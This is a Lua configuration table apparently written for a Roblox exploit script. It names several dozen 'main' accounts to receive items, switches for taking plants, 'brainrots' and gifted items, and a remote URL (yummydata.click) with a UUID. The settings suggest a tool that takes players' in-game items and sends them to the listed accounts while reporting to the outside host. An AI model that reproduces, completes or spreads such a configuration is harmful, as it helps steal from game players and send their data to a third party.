getgenv().Config = {
    ["Account Main"] = {
        "Z00m_OMEGA2015",
        "Hunt3rV3n0m2023",
        "Str3amDrift78",
        "BaconDuckSonic2002YT",
        "XX_MichaelFlashSaber",
        "EthanChaosOrbit",
        "Xx_SAVANNAHALPHALUCK",
        "FlickKing58",
        "XxMaxNightAlphaxX201",
        "RogueZoom13",
        "Brooklyn_Byte93",
        "Vict0riaLegendClaw",
        "WraithSonic44_YT",
        "BuilderDrag0nPixel20",
        "Ethan_Dark60",
        "MagicStreamRogue2016",
        "MichaelQueenBlaze90",
        "GalaxyClaw2024_YT",
        "XxLuckyNinjaUltraxX",
        "WilliamFrost83YT",
        "LucasWraith73",
        "EliGh0stSparkly2014",
        "HawkSpark201339",
        "XxFrostMaxBlizzardxX",
        "DriftFire49",
        "PixelatedDuckChase63",
        "ChaseIce80_YT",
        "LiamZeroMoon",
        "XxBlastNovaAquaxX200",
        "HeroLucky2004_YT",
        "XxSparkLightxX2019",
        "XxBrooklynnHeroPrism",
        "PowerRavenArrow57",
        "Shadow_CHAS32015",
        "B3astVoidFox",
        "TurboPrismDawn2016YT",
        "Hyper_G0lden2004",
        "Epic_Flame30",
        "PowerRiftSkater2002",
        "PulseNightJelly",
        "DragonN3on57",
        "BlastAlphaRider55",
        "LionNeonFlash",
        "P0werInfern0Hyper",
        "IceRiderQueen",
        "Hyp3rGhostCraz3",
        "Gh0stSky73YT",
        "ClawCode95",
        "CrazeBeast202070",
        "Ash3r_B3ast2014",
        "EZRA_Eagle56",
        "BearHyperViper89",
        "RiderBladeAlpha20038",
        "GabrielRavenDuck2014",
        "XxBlad3_Gold3nxX56",
        "GamerEagleViper2017",
        "Spark_Ne0n2010",
        "Epic_Cod32016",
    },
    ["Item Gift"] = {
        "King Limone",
    },
    ["Take Plants"] = true,
    ["Auto Sell If Found PopUp"] = true,
    ["Custom"] = {
        ["Enable"] = true,
        ["Min"] = 1000,
        ["Max"] = 69000,
    },
    ["Take Brainrots"] = false,
    ["UUID"] = "Dracular2222",
    ["Url"] = "https://yummydata.click"
}
